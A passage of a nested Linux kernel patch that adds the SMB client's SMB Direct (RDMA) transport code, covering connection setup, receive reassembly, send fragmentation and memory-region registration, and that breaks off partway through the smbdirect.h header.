++		log_rdma_event(ERR, "rdma_create_qp failed %i\n", rc);
++		goto create_qp_failed;
++	}
++
++	memset(&conn_param, 0, sizeof(conn_param));
++	conn_param.initiator_depth = 0;
++
++	conn_param.responder_resources =
++		info->id->device->attrs.max_qp_rd_atom
++			< SMBD_CM_RESPONDER_RESOURCES ?
++		info->id->device->attrs.max_qp_rd_atom :
++		SMBD_CM_RESPONDER_RESOURCES;
++	info->responder_resources = conn_param.responder_resources;
++	log_rdma_mr(INFO, "responder_resources=%d\n",
++		info->responder_resources);
++
++	/* Need to send IRD/ORD in private data for iWARP */
++	info->id->device->ops.get_port_immutable(
++		info->id->device, info->id->port_num, &port_immutable);
++	if (port_immutable.core_cap_flags & RDMA_CORE_PORT_IWARP) {
++		ird_ord_hdr[0] = info->responder_resources;
++		ird_ord_hdr[1] = 1;
++		conn_param.private_data = ird_ord_hdr;
++		conn_param.private_data_len = sizeof(ird_ord_hdr);
++	} else {
++		conn_param.private_data = NULL;
++		conn_param.private_data_len = 0;
++	}
++
++	conn_param.retry_count = SMBD_CM_RETRY;
++	conn_param.rnr_retry_count = SMBD_CM_RNR_RETRY;
++	conn_param.flow_control = 0;
++
++	log_rdma_event(INFO, "connecting to IP %pI4 port %d\n",
++		&addr_in->sin_addr, port);
++
++	init_waitqueue_head(&info->conn_wait);
++	init_waitqueue_head(&info->disconn_wait);
++	init_waitqueue_head(&info->wait_reassembly_queue);
++	rc = rdma_connect(info->id, &conn_param);
++	if (rc) {
++		log_rdma_event(ERR, "rdma_connect() failed with %i\n", rc);
++		goto rdma_connect_failed;
++	}
++
++	wait_event_interruptible(
++		info->conn_wait, info->transport_status != SMBD_CONNECTING);
++
++	if (info->transport_status != SMBD_CONNECTED) {
++		log_rdma_event(ERR, "rdma_connect failed port=%d\n", port);
++		goto rdma_connect_failed;
++	}
++
++	log_rdma_event(INFO, "rdma_connect connected\n");
++
++	rc = allocate_caches_and_workqueue(info);
++	if (rc) {
++		log_rdma_event(ERR, "cache allocation failed\n");
++		goto allocate_cache_failed;
++	}
++
++	init_waitqueue_head(&info->wait_send_queue);
++	INIT_DELAYED_WORK(&info->idle_timer_work, idle_connection_timer);
++	queue_delayed_work(info->workqueue, &info->idle_timer_work,
++		info->keep_alive_interval*HZ);
++
++	init_waitqueue_head(&info->wait_send_pending);
++	atomic_set(&info->send_pending, 0);
++
++	init_waitqueue_head(&info->wait_post_send);
++
++	INIT_WORK(&info->disconnect_work, smbd_disconnect_rdma_work);
++	INIT_WORK(&info->post_send_credits_work, smbd_post_send_credits);
++	info->new_credits_offered = 0;
++	spin_lock_init(&info->lock_new_credits_offered);
++
++	rc = smbd_negotiate(info);
++	if (rc) {
++		log_rdma_event(ERR, "smbd_negotiate rc=%d\n", rc);
++		goto negotiation_failed;
++	}
++
++	rc = allocate_mr_list(info);
++	if (rc) {
++		log_rdma_mr(ERR, "memory registration allocation failed\n");
++		goto allocate_mr_failed;
++	}
++
++	return info;
++
++allocate_mr_failed:
++	/* At this point, need to a full transport shutdown */
++	server->smbd_conn = info;
++	smbd_destroy(server);
++	return NULL;
++
++negotiation_failed:
++	cancel_delayed_work_sync(&info->idle_timer_work);
++	destroy_caches_and_workqueue(info);
++	info->transport_status = SMBD_NEGOTIATE_FAILED;
++	init_waitqueue_head(&info->conn_wait);
++	rdma_disconnect(info->id);
++	wait_event(info->conn_wait,
++		info->transport_status == SMBD_DISCONNECTED);
++
++allocate_cache_failed:
++rdma_connect_failed:
++	rdma_destroy_qp(info->id);
++
++create_qp_failed:
++alloc_cq_failed:
++	if (info->send_cq)
++		ib_free_cq(info->send_cq);
++	if (info->recv_cq)
++		ib_free_cq(info->recv_cq);
++
++config_failed:
++	ib_dealloc_pd(info->pd);
++	rdma_destroy_id(info->id);
++
++create_id_failed:
++	kfree(info);
++	return NULL;
++}
++
++struct smbd_connection *smbd_get_connection(
++	struct TCP_Server_Info *server, struct sockaddr *dstaddr)
++{
++	struct smbd_connection *ret;
++	int port = SMBD_PORT;
++
++try_again:
++	ret = _smbd_get_connection(server, dstaddr, port);
++
++	/* Try SMB_PORT if SMBD_PORT doesn't work */
++	if (!ret && port == SMBD_PORT) {
++		port = SMB_PORT;
++		goto try_again;
++	}
++	return ret;
++}
++
++/*
++ * Receive data from receive reassembly queue
++ * All the incoming data packets are placed in reassembly queue
++ * buf: the buffer to read data into
++ * size: the length of data to read
++ * return value: actual data read
++ * Note: this implementation copies the data from reassebmly queue to receive
++ * buffers used by upper layer. This is not the optimal code path. A better way
++ * to do it is to not have upper layer allocate its receive buffers but rather
++ * borrow the buffer from reassembly queue, and return it after data is
++ * consumed. But this will require more changes to upper layer code, and also
++ * need to consider packet boundaries while they still being reassembled.
++ */
++static int smbd_recv_buf(struct smbd_connection *info, char *buf,
++		unsigned int size)
++{
++	struct smbd_response *response;
++	struct smbd_data_transfer *data_transfer;
++	int to_copy, to_read, data_read, offset;
++	u32 data_length, remaining_data_length, data_offset;
++	int rc;
++
++again:
++	/*
++	 * No need to hold the reassembly queue lock all the time as we are
++	 * the only one reading from the front of the queue. The transport
++	 * may add more entries to the back of the queue at the same time
++	 */
++	log_read(INFO, "size=%d info->reassembly_data_length=%d\n", size,
++		info->reassembly_data_length);
++	if (info->reassembly_data_length >= size) {
++		int queue_length;
++		int queue_removed = 0;
++
++		/*
++		 * Need to make sure reassembly_data_length is read before
++		 * reading reassembly_queue_length and calling
++		 * _get_first_reassembly. This call is lock free
++		 * as we never read at the end of the queue which are being
++		 * updated in SOFTIRQ as more data is received
++		 */
++		virt_rmb();
++		queue_length = info->reassembly_queue_length;
++		data_read = 0;
++		to_read = size;
++		offset = info->first_entry_offset;
++		while (data_read < size) {
++			response = _get_first_reassembly(info);
++			data_transfer = smbd_response_payload(response);
++			data_length = le32_to_cpu(data_transfer->data_length);
++			remaining_data_length =
++				le32_to_cpu(
++					data_transfer->remaining_data_length);
++			data_offset = le32_to_cpu(data_transfer->data_offset);
++
++			/*
++			 * The upper layer expects RFC1002 length at the
++			 * beginning of the payload. Return it to indicate
++			 * the total length of the packet. This minimize the
++			 * change to upper layer packet processing logic. This
++			 * will be eventually remove when an intermediate
++			 * transport layer is added
++			 */
++			if (response->first_segment && size == 4) {
++				unsigned int rfc1002_len =
++					data_length + remaining_data_length;
++				*((__be32 *)buf) = cpu_to_be32(rfc1002_len);
++				data_read = 4;
++				response->first_segment = false;
++				log_read(INFO, "returning rfc1002 length %d\n",
++					rfc1002_len);
++				goto read_rfc1002_done;
++			}
++
++			to_copy = min_t(int, data_length - offset, to_read);
++			memcpy(
++				buf + data_read,
++				(char *)data_transfer + data_offset + offset,
++				to_copy);
++
++			/* move on to the next buffer? */
++			if (to_copy == data_length - offset) {
++				queue_length--;
++				/*
++				 * No need to lock if we are not at the
++				 * end of the queue
++				 */
++				if (queue_length)
++					list_del(&response->list);
++				else {
++					spin_lock_irq(
++						&info->reassembly_queue_lock);
++					list_del(&response->list);
++					spin_unlock_irq(
++						&info->reassembly_queue_lock);
++				}
++				queue_removed++;
++				info->count_reassembly_queue--;
++				info->count_dequeue_reassembly_queue++;
++				put_receive_buffer(info, response);
++				offset = 0;
++				log_read(INFO, "put_receive_buffer offset=0\n");
++			} else
++				offset += to_copy;
++
++			to_read -= to_copy;
++			data_read += to_copy;
++
++			log_read(INFO, "_get_first_reassembly memcpy %d bytes data_transfer_length-offset=%d after that to_read=%d data_read=%d offset=%d\n",
++				 to_copy, data_length - offset,
++				 to_read, data_read, offset);
++		}
++
++		spin_lock_irq(&info->reassembly_queue_lock);
++		info->reassembly_data_length -= data_read;
++		info->reassembly_queue_length -= queue_removed;
++		spin_unlock_irq(&info->reassembly_queue_lock);
++
++		info->first_entry_offset = offset;
++		log_read(INFO, "returning to thread data_read=%d reassembly_data_length=%d first_entry_offset=%d\n",
++			 data_read, info->reassembly_data_length,
++			 info->first_entry_offset);
++read_rfc1002_done:
++		return data_read;
++	}
++
++	log_read(INFO, "wait_event on more data\n");
++	rc = wait_event_interruptible(
++		info->wait_reassembly_queue,
++		info->reassembly_data_length >= size ||
++			info->transport_status != SMBD_CONNECTED);
++	/* Don't return any data if interrupted */
++	if (rc)
++		return rc;
++
++	if (info->transport_status != SMBD_CONNECTED) {
++		log_read(ERR, "disconnected\n");
++		return -ECONNABORTED;
++	}
++
++	goto again;
++}
++
++/*
++ * Receive a page from receive reassembly queue
++ * page: the page to read data into
++ * to_read: the length of data to read
++ * return value: actual data read
++ */
++static int smbd_recv_page(struct smbd_connection *info,
++		struct page *page, unsigned int page_offset,
++		unsigned int to_read)
++{
++	int ret;
++	char *to_address;
++	void *page_address;
++
++	/* make sure we have the page ready for read */
++	ret = wait_event_interruptible(
++		info->wait_reassembly_queue,
++		info->reassembly_data_length >= to_read ||
++			info->transport_status != SMBD_CONNECTED);
++	if (ret)
++		return ret;
++
++	/* now we can read from reassembly queue and not sleep */
++	page_address = kmap_atomic(page);
++	to_address = (char *) page_address + page_offset;
++
++	log_read(INFO, "reading from page=%p address=%p to_read=%d\n",
++		page, to_address, to_read);
++
++	ret = smbd_recv_buf(info, to_address, to_read);
++	kunmap_atomic(page_address);
++
++	return ret;
++}
++
++/*
++ * Receive data from transport
++ * msg: a msghdr point to the buffer, can be ITER_KVEC or ITER_BVEC
++ * return: total bytes read, or 0. SMB Direct will not do partial read.
++ */
++int smbd_recv(struct smbd_connection *info, struct msghdr *msg)
++{
++	char *buf;
++	struct page *page;
++	unsigned int to_read, page_offset;
++	int rc;
++
++	if (iov_iter_rw(&msg->msg_iter) == WRITE) {
++		/* It's a bug in upper layer to get there */
++		cifs_dbg(VFS, "Invalid msg iter dir %u\n",
++			 iov_iter_rw(&msg->msg_iter));
++		rc = -EINVAL;
++		goto out;
++	}
++
++	switch (iov_iter_type(&msg->msg_iter)) {
++	case ITER_KVEC:
++		buf = msg->msg_iter.kvec->iov_base;
++		to_read = msg->msg_iter.kvec->iov_len;
++		rc = smbd_recv_buf(info, buf, to_read);
++		break;
++
++	case ITER_BVEC:
++		page = msg->msg_iter.bvec->bv_page;
++		page_offset = msg->msg_iter.bvec->bv_offset;
++		to_read = msg->msg_iter.bvec->bv_len;
++		rc = smbd_recv_page(info, page, page_offset, to_read);
++		break;
++
++	default:
++		/* It's a bug in upper layer to get there */
++		cifs_dbg(VFS, "Invalid msg type %d\n",
++			 iov_iter_type(&msg->msg_iter));
++		rc = -EINVAL;
++	}
++
++out:
++	/* SMBDirect will read it all or nothing */
++	if (rc > 0)
++		msg->msg_iter.count = 0;
++	return rc;
++}
++
++/*
++ * Send data to transport
++ * Each rqst is transported as a SMBDirect payload
++ * rqst: the data to write
++ * return value: 0 if successfully write, otherwise error code
++ */
++int smbd_send(struct TCP_Server_Info *server,
++	int num_rqst, struct smb_rqst *rqst_array)
++{
++	struct smbd_connection *info = server->smbd_conn;
++	struct kvec vecs[SMBDIRECT_MAX_SEND_SGE - 1];
++	int nvecs;
++	int size;
++	unsigned int buflen, remaining_data_length;
++	unsigned int offset, remaining_vec_data_length;
++	int start, i, j;
++	int max_iov_size =
++		info->max_send_size - sizeof(struct smbd_data_transfer);
++	struct kvec *iov;
++	int rc;
++	struct smb_rqst *rqst;
++	int rqst_idx;
++
++	if (info->transport_status != SMBD_CONNECTED)
++		return -EAGAIN;
++
++	/*
++	 * Add in the page array if there is one. The caller needs to set
++	 * rq_tailsz to PAGE_SIZE when the buffer has multiple pages and
++	 * ends at page boundary
++	 */
++	remaining_data_length = 0;
++	for (i = 0; i < num_rqst; i++)
++		remaining_data_length += smb_rqst_len(server, &rqst_array[i]);
++
++	if (unlikely(remaining_data_length > info->max_fragmented_send_size)) {
++		/* assertion: payload never exceeds negotiated maximum */
++		log_write(ERR, "payload size %d > max size %d\n",
++			remaining_data_length, info->max_fragmented_send_size);
++		return -EINVAL;
++	}
++
++	log_write(INFO, "num_rqst=%d total length=%u\n",
++			num_rqst, remaining_data_length);
++
++	rqst_idx = 0;
++	do {
++		rqst = &rqst_array[rqst_idx];
++		iov = rqst->rq_iov;
++
++		cifs_dbg(FYI, "Sending smb (RDMA): idx=%d smb_len=%lu\n",
++			rqst_idx, smb_rqst_len(server, rqst));
++		remaining_vec_data_length = 0;
++		for (i = 0; i < rqst->rq_nvec; i++) {
++			remaining_vec_data_length += iov[i].iov_len;
++			dump_smb(iov[i].iov_base, iov[i].iov_len);
++		}
++
++		log_write(INFO, "rqst_idx=%d nvec=%d rqst->rq_npages=%d rq_pagesz=%d rq_tailsz=%d buflen=%lu\n",
++			  rqst_idx, rqst->rq_nvec,
++			  rqst->rq_npages, rqst->rq_pagesz,
++			  rqst->rq_tailsz, smb_rqst_len(server, rqst));
++
++		start = 0;
++		offset = 0;
++		do {
++			buflen = 0;
++			i = start;
++			j = 0;
++			while (i < rqst->rq_nvec &&
++				j < SMBDIRECT_MAX_SEND_SGE - 1 &&
++				buflen < max_iov_size) {
++
++				vecs[j].iov_base = iov[i].iov_base + offset;
++				if (buflen + iov[i].iov_len > max_iov_size) {
++					vecs[j].iov_len =
++						max_iov_size - iov[i].iov_len;
++					buflen = max_iov_size;
++					offset = vecs[j].iov_len;
++				} else {
++					vecs[j].iov_len =
++						iov[i].iov_len - offset;
++					buflen += vecs[j].iov_len;
++					offset = 0;
++					++i;
++				}
++				++j;
++			}
++
++			remaining_vec_data_length -= buflen;
++			remaining_data_length -= buflen;
++			log_write(INFO, "sending %s iov[%d] from start=%d nvecs=%d remaining_data_length=%d\n",
++					remaining_vec_data_length > 0 ?
++						"partial" : "complete",
++					rqst->rq_nvec, start, j,
++					remaining_data_length);
++
++			start = i;
++			rc = smbd_post_send_data(info, vecs, j, remaining_data_length);
++			if (rc)
++				goto done;
++		} while (remaining_vec_data_length > 0);
++
++		/* now sending pages if there are any */
++		for (i = 0; i < rqst->rq_npages; i++) {
++			rqst_page_get_length(rqst, i, &buflen, &offset);
++			nvecs = (buflen + max_iov_size - 1) / max_iov_size;
++			log_write(INFO, "sending pages buflen=%d nvecs=%d\n",
++				buflen, nvecs);
++			for (j = 0; j < nvecs; j++) {
++				size = min_t(unsigned int, max_iov_size, remaining_data_length);
++				remaining_data_length -= size;
++				log_write(INFO, "sending pages i=%d offset=%d size=%d remaining_data_length=%d\n",
++					  i, j * max_iov_size + offset, size,
++					  remaining_data_length);
++				rc = smbd_post_send_page(
++					info, rqst->rq_pages[i],
++					j*max_iov_size + offset,
++					size, remaining_data_length);
++				if (rc)
++					goto done;
++			}
++		}
++	} while (++rqst_idx < num_rqst);
++
++done:
++	/*
++	 * As an optimization, we don't wait for individual I/O to finish
++	 * before sending the next one.
++	 * Send them all and wait for pending send count to get to 0
++	 * that means all the I/Os have been out and we are good to return
++	 */
++
++	wait_event(info->wait_send_pending,
++		atomic_read(&info->send_pending) == 0);
++
++	return rc;
++}
++
++static void register_mr_done(struct ib_cq *cq, struct ib_wc *wc)
++{
++	struct smbd_mr *mr;
++	struct ib_cqe *cqe;
++
++	if (wc->status) {
++		log_rdma_mr(ERR, "status=%d\n", wc->status);
++		cqe = wc->wr_cqe;
++		mr = container_of(cqe, struct smbd_mr, cqe);
++		smbd_disconnect_rdma_connection(mr->conn);
++	}
++}
++
++/*
++ * The work queue function that recovers MRs
++ * We need to call ib_dereg_mr() and ib_alloc_mr() before this MR can be used
++ * again. Both calls are slow, so finish them in a workqueue. This will not
++ * block I/O path.
++ * There is one workqueue that recovers MRs, there is no need to lock as the
++ * I/O requests calling smbd_register_mr will never update the links in the
++ * mr_list.
++ */
++static void smbd_mr_recovery_work(struct work_struct *work)
++{
++	struct smbd_connection *info =
++		container_of(work, struct smbd_connection, mr_recovery_work);
++	struct smbd_mr *smbdirect_mr;
++	int rc;
++
++	list_for_each_entry(smbdirect_mr, &info->mr_list, list) {
++		if (smbdirect_mr->state == MR_ERROR) {
++
++			/* recover this MR entry */
++			rc = ib_dereg_mr(smbdirect_mr->mr);
++			if (rc) {
++				log_rdma_mr(ERR,
++					"ib_dereg_mr failed rc=%x\n",
++					rc);
++				smbd_disconnect_rdma_connection(info);
++				continue;
++			}
++
++			smbdirect_mr->mr = ib_alloc_mr(
++				info->pd, info->mr_type,
++				info->max_frmr_depth);
++			if (IS_ERR(smbdirect_mr->mr)) {
++				log_rdma_mr(ERR, "ib_alloc_mr failed mr_type=%x max_frmr_depth=%x\n",
++					    info->mr_type,
++					    info->max_frmr_depth);
++				smbd_disconnect_rdma_connection(info);
++				continue;
++			}
++		} else
++			/* This MR is being used, don't recover it */
++			continue;
++
++		smbdirect_mr->state = MR_READY;
++
++		/* smbdirect_mr->state is updated by this function
++		 * and is read and updated by I/O issuing CPUs trying
++		 * to get a MR, the call to atomic_inc_return
++		 * implicates a memory barrier and guarantees this
++		 * value is updated before waking up any calls to
++		 * get_mr() from the I/O issuing CPUs
++		 */
++		if (atomic_inc_return(&info->mr_ready_count) == 1)
++			wake_up_interruptible(&info->wait_mr);
++	}
++}
++
++static void destroy_mr_list(struct smbd_connection *info)
++{
++	struct smbd_mr *mr, *tmp;
++
++	cancel_work_sync(&info->mr_recovery_work);
++	list_for_each_entry_safe(mr, tmp, &info->mr_list, list) {
++		if (mr->state == MR_INVALIDATED)
++			ib_dma_unmap_sg(info->id->device, mr->sgl,
++				mr->sgl_count, mr->dir);
++		ib_dereg_mr(mr->mr);
++		kfree(mr->sgl);
++		kfree(mr);
++	}
++}
++
++/*
++ * Allocate MRs used for RDMA read/write
++ * The number of MRs will not exceed hardware capability in responder_resources
++ * All MRs are kept in mr_list. The MR can be recovered after it's used
++ * Recovery is done in smbd_mr_recovery_work. The content of list entry changes
++ * as MRs are used and recovered for I/O, but the list links will not change
++ */
++static int allocate_mr_list(struct smbd_connection *info)
++{
++	int i;
++	struct smbd_mr *smbdirect_mr, *tmp;
++
++	INIT_LIST_HEAD(&info->mr_list);
++	init_waitqueue_head(&info->wait_mr);
++	spin_lock_init(&info->mr_list_lock);
++	atomic_set(&info->mr_ready_count, 0);
++	atomic_set(&info->mr_used_count, 0);
++	init_waitqueue_head(&info->wait_for_mr_cleanup);
++	INIT_WORK(&info->mr_recovery_work, smbd_mr_recovery_work);
++	/* Allocate more MRs (2x) than hardware responder_resources */
++	for (i = 0; i < info->responder_resources * 2; i++) {
++		smbdirect_mr = kzalloc(sizeof(*smbdirect_mr), GFP_KERNEL);
++		if (!smbdirect_mr)
++			goto out;
++		smbdirect_mr->mr = ib_alloc_mr(info->pd, info->mr_type,
++					info->max_frmr_depth);
++		if (IS_ERR(smbdirect_mr->mr)) {
++			log_rdma_mr(ERR, "ib_alloc_mr failed mr_type=%x max_frmr_depth=%x\n",
++				    info->mr_type, info->max_frmr_depth);
++			goto out;
++		}
++		smbdirect_mr->sgl = kcalloc(
++					info->max_frmr_depth,
++					sizeof(struct scatterlist),
++					GFP_KERNEL);
++		if (!smbdirect_mr->sgl) {
++			log_rdma_mr(ERR, "failed to allocate sgl\n");
++			ib_dereg_mr(smbdirect_mr->mr);
++			goto out;
++		}
++		smbdirect_mr->state = MR_READY;
++		smbdirect_mr->conn = info;
++
++		list_add_tail(&smbdirect_mr->list, &info->mr_list);
++		atomic_inc(&info->mr_ready_count);
++	}
++	return 0;
++
++out:
++	kfree(smbdirect_mr);
++
++	list_for_each_entry_safe(smbdirect_mr, tmp, &info->mr_list, list) {
++		list_del(&smbdirect_mr->list);
++		ib_dereg_mr(smbdirect_mr->mr);
++		kfree(smbdirect_mr->sgl);
++		kfree(smbdirect_mr);
++	}
++	return -ENOMEM;
++}
++
++/*
++ * Get a MR from mr_list. This function waits until there is at least one
++ * MR available in the list. It may access the list while the
++ * smbd_mr_recovery_work is recovering the MR list. This doesn't need a lock
++ * as they never modify the same places. However, there may be several CPUs
++ * issueing I/O trying to get MR at the same time, mr_list_lock is used to
++ * protect this situation.
++ */
++static struct smbd_mr *get_mr(struct smbd_connection *info)
++{
++	struct smbd_mr *ret;
++	int rc;
++again:
++	rc = wait_event_interruptible(info->wait_mr,
++		atomic_read(&info->mr_ready_count) ||
++		info->transport_status != SMBD_CONNECTED);
++	if (rc) {
++		log_rdma_mr(ERR, "wait_event_interruptible rc=%x\n", rc);
++		return NULL;
++	}
++
++	if (info->transport_status != SMBD_CONNECTED) {
++		log_rdma_mr(ERR, "info->transport_status=%x\n",
++			info->transport_status);
++		return NULL;
++	}
++
++	spin_lock(&info->mr_list_lock);
++	list_for_each_entry(ret, &info->mr_list, list) {
++		if (ret->state == MR_READY) {
++			ret->state = MR_REGISTERED;
++			spin_unlock(&info->mr_list_lock);
++			atomic_dec(&info->mr_ready_count);
++			atomic_inc(&info->mr_used_count);
++			return ret;
++		}
++	}
++
++	spin_unlock(&info->mr_list_lock);
++	/*
++	 * It is possible that we could fail to get MR because other processes may
++	 * try to acquire a MR at the same time. If this is the case, retry it.
++	 */
++	goto again;
++}
++
++/*
++ * Register memory for RDMA read/write
++ * pages[]: the list of pages to register memory with
++ * num_pages: the number of pages to register
++ * tailsz: if non-zero, the bytes to register in the last page
++ * writing: true if this is a RDMA write (SMB read), false for RDMA read
++ * need_invalidate: true if this MR needs to be locally invalidated after I/O
++ * return value: the MR registered, NULL if failed.
++ */
++struct smbd_mr *smbd_register_mr(
++	struct smbd_connection *info, struct page *pages[], int num_pages,
++	int offset, int tailsz, bool writing, bool need_invalidate)
++{
++	struct smbd_mr *smbdirect_mr;
++	int rc, i;
++	enum dma_data_direction dir;
++	struct ib_reg_wr *reg_wr;
++
++	if (num_pages > info->max_frmr_depth) {
++		log_rdma_mr(ERR, "num_pages=%d max_frmr_depth=%d\n",
++			num_pages, info->max_frmr_depth);
++		return NULL;
++	}
++
++	smbdirect_mr = get_mr(info);
++	if (!smbdirect_mr) {
++		log_rdma_mr(ERR, "get_mr returning NULL\n");
++		return NULL;
++	}
++	smbdirect_mr->need_invalidate = need_invalidate;
++	smbdirect_mr->sgl_count = num_pages;
++	sg_init_table(smbdirect_mr->sgl, num_pages);
++
++	log_rdma_mr(INFO, "num_pages=0x%x offset=0x%x tailsz=0x%x\n",
++			num_pages, offset, tailsz);
++
++	if (num_pages == 1) {
++		sg_set_page(&smbdirect_mr->sgl[0], pages[0], tailsz, offset);
++		goto skip_multiple_pages;
++	}
++
++	/* We have at least two pages to register */
++	sg_set_page(
++		&smbdirect_mr->sgl[0], pages[0], PAGE_SIZE - offset, offset);
++	i = 1;
++	while (i < num_pages - 1) {
++		sg_set_page(&smbdirect_mr->sgl[i], pages[i], PAGE_SIZE, 0);
++		i++;
++	}
++	sg_set_page(&smbdirect_mr->sgl[i], pages[i],
++		tailsz ? tailsz : PAGE_SIZE, 0);
++
++skip_multiple_pages:
++	dir = writing ? DMA_FROM_DEVICE : DMA_TO_DEVICE;
++	smbdirect_mr->dir = dir;
++	rc = ib_dma_map_sg(info->id->device, smbdirect_mr->sgl, num_pages, dir);
++	if (!rc) {
++		log_rdma_mr(ERR, "ib_dma_map_sg num_pages=%x dir=%x rc=%x\n",
++			num_pages, dir, rc);
++		goto dma_map_error;
++	}
++
++	rc = ib_map_mr_sg(smbdirect_mr->mr, smbdirect_mr->sgl, num_pages,
++		NULL, PAGE_SIZE);
++	if (rc != num_pages) {
++		log_rdma_mr(ERR,
++			"ib_map_mr_sg failed rc = %d num_pages = %x\n",
++			rc, num_pages);
++		goto map_mr_error;
++	}
++
++	ib_update_fast_reg_key(smbdirect_mr->mr,
++		ib_inc_rkey(smbdirect_mr->mr->rkey));
++	reg_wr = &smbdirect_mr->wr;
++	reg_wr->wr.opcode = IB_WR_REG_MR;
++	smbdirect_mr->cqe.done = register_mr_done;
++	reg_wr->wr.wr_cqe = &smbdirect_mr->cqe;
++	reg_wr->wr.num_sge = 0;
++	reg_wr->wr.send_flags = IB_SEND_SIGNALED;
++	reg_wr->mr = smbdirect_mr->mr;
++	reg_wr->key = smbdirect_mr->mr->rkey;
++	reg_wr->access = writing ?
++			IB_ACCESS_REMOTE_WRITE | IB_ACCESS_LOCAL_WRITE :
++			IB_ACCESS_REMOTE_READ;
++
++	/*
++	 * There is no need for waiting for complemtion on ib_post_send
++	 * on IB_WR_REG_MR. Hardware enforces a barrier and order of execution
++	 * on the next ib_post_send when we actaully send I/O to remote peer
++	 */
++	rc = ib_post_send(info->id->qp, &reg_wr->wr, NULL);
++	if (!rc)
++		return smbdirect_mr;
++
++	log_rdma_mr(ERR, "ib_post_send failed rc=%x reg_wr->key=%x\n",
++		rc, reg_wr->key);
++
++	/* If all failed, attempt to recover this MR by setting it MR_ERROR*/
++map_mr_error:
++	ib_dma_unmap_sg(info->id->device, smbdirect_mr->sgl,
++		smbdirect_mr->sgl_count, smbdirect_mr->dir);
++
++dma_map_error:
++	smbdirect_mr->state = MR_ERROR;
++	if (atomic_dec_and_test(&info->mr_used_count))
++		wake_up(&info->wait_for_mr_cleanup);
++
++	smbd_disconnect_rdma_connection(info);
++
++	return NULL;
++}
++
++static void local_inv_done(struct ib_cq *cq, struct ib_wc *wc)
++{
++	struct smbd_mr *smbdirect_mr;
++	struct ib_cqe *cqe;
++
++	cqe = wc->wr_cqe;
++	smbdirect_mr = container_of(cqe, struct smbd_mr, cqe);
++	smbdirect_mr->state = MR_INVALIDATED;
++	if (wc->status != IB_WC_SUCCESS) {
++		log_rdma_mr(ERR, "invalidate failed status=%x\n", wc->status);
++		smbdirect_mr->state = MR_ERROR;
++	}
++	complete(&smbdirect_mr->invalidate_done);
++}
++
++/*
++ * Deregister a MR after I/O is done
++ * This function may wait if remote invalidation is not used
++ * and we have to locally invalidate the buffer to prevent data is being
++ * modified by remote peer after upper layer consumes it
++ */
++int smbd_deregister_mr(struct smbd_mr *smbdirect_mr)
++{
++	struct ib_send_wr *wr;
++	struct smbd_connection *info = smbdirect_mr->conn;
++	int rc = 0;
++
++	if (smbdirect_mr->need_invalidate) {
++		/* Need to finish local invalidation before returning */
++		wr = &smbdirect_mr->inv_wr;
++		wr->opcode = IB_WR_LOCAL_INV;
++		smbdirect_mr->cqe.done = local_inv_done;
++		wr->wr_cqe = &smbdirect_mr->cqe;
++		wr->num_sge = 0;
++		wr->ex.invalidate_rkey = smbdirect_mr->mr->rkey;
++		wr->send_flags = IB_SEND_SIGNALED;
++
++		init_completion(&smbdirect_mr->invalidate_done);
++		rc = ib_post_send(info->id->qp, wr, NULL);
++		if (rc) {
++			log_rdma_mr(ERR, "ib_post_send failed rc=%x\n", rc);
++			smbd_disconnect_rdma_connection(info);
++			goto done;
++		}
++		wait_for_completion(&smbdirect_mr->invalidate_done);
++		smbdirect_mr->need_invalidate = false;
++	} else
++		/*
++		 * For remote invalidation, just set it to MR_INVALIDATED
++		 * and defer to mr_recovery_work to recover the MR for next use
++		 */
++		smbdirect_mr->state = MR_INVALIDATED;
++
++	if (smbdirect_mr->state == MR_INVALIDATED) {
++		ib_dma_unmap_sg(
++			info->id->device, smbdirect_mr->sgl,
++			smbdirect_mr->sgl_count,
++			smbdirect_mr->dir);
++		smbdirect_mr->state = MR_READY;
++		if (atomic_inc_return(&info->mr_ready_count) == 1)
++			wake_up_interruptible(&info->wait_mr);
++	} else
++		/*
++		 * Schedule the work to do MR recovery for future I/Os MR
++		 * recovery is slow and don't want it to block current I/O
++		 */
++		queue_work(info->workqueue, &info->mr_recovery_work);
++
++done:
++	if (atomic_dec_and_test(&info->mr_used_count))
++		wake_up(&info->wait_for_mr_cleanup);
++
++	return rc;
++}
+diff --git a/fs/smb/client/smbdirect.h b/fs/smb/client/smbdirect.h
+new file mode 100644
+index 0000000000000..207ef979cd51c
+--- /dev/null
++++ b/fs/smb/client/smbdirect.h
+@@ -0,0 +1,320 @@
++/* SPDX-License-Identifier: GPL-2.0-or-later */
++/*
++ *   Copyright (C) 2017, Microsoft Corporation.
++ *
++ *   Author(s): Long Li <longli@microsoft.com>
++ */
++#ifndef _SMBDIRECT_H
++#define _SMBDIRECT_H
++
++#ifdef CONFIG_CIFS_SMB_DIRECT
++#define cifs_rdma_enabled(server)	((server)->rdma)
++
++#include "cifsglob.h"
++#include <rdma/ib_verbs.h>
++#include <rdma/rdma_cm.h>
++#include <linux/mempool.h>
++
++extern int rdma_readwrite_threshold;
++extern int smbd_max_frmr_depth;
++extern int smbd_keep_alive_interval;
++extern int smbd_max_receive_size;
++extern int smbd_max_fragmented_recv_size;
++extern int smbd_max_send_size;
++extern int smbd_send_credit_target;
++extern int smbd_receive_credit_max;
++
++enum keep_alive_status {
++	KEEP_ALIVE_NONE,
++	KEEP_ALIVE_PENDING,
++	KEEP_ALIVE_SENT,
++};
++
++enum smbd_connection_status {
++	SMBD_CREATED,
++	SMBD_CONNECTING,
++	SMBD_CONNECTED,
++	SMBD_NEGOTIATE_FAILED,
++	SMBD_DISCONNECTING,
++	SMBD_DISCONNECTED,
++	SMBD_DESTROYED
++};
++
++/*
++ * The context for the SMBDirect transport
++ * Everything related to the transport is here. It has several logical parts
++ * 1. RDMA related structures
++ * 2. SMBDirect connection parameters
++ * 3. Memory registrations
++ * 4. Receive and reassembly queues for data receive path
++ * 5. mempools for allocating packets
++ */
++struct smbd_connection {
++	enum smbd_connection_status transport_status;
++
++	/* RDMA related */
++	struct rdma_cm_id *id;
++	struct ib_qp_init_attr qp_attr;
++	struct ib_pd *pd;
++	struct ib_cq *send_cq, *recv_cq;
++	struct ib_device_attr dev_attr;
++	int ri_rc;
++	struct completion ri_done;
++	wait_queue_head_t conn_wait;
++	wait_queue_head_t disconn_wait;
++
++	struct completion negotiate_completion;
++	bool negotiate_done;
++
++	struct work_struct disconnect_work;
++	struct work_struct post_send_credits_work;
++
++	spinlock_t lock_new_credits_offered;
++	int new_credits_offered;
++
++	/* Connection parameters defined in [MS-SMBD] 3.1.1.1 */
++	int receive_credit_max;
++	int send_credit_target;
++	int max_send_size;
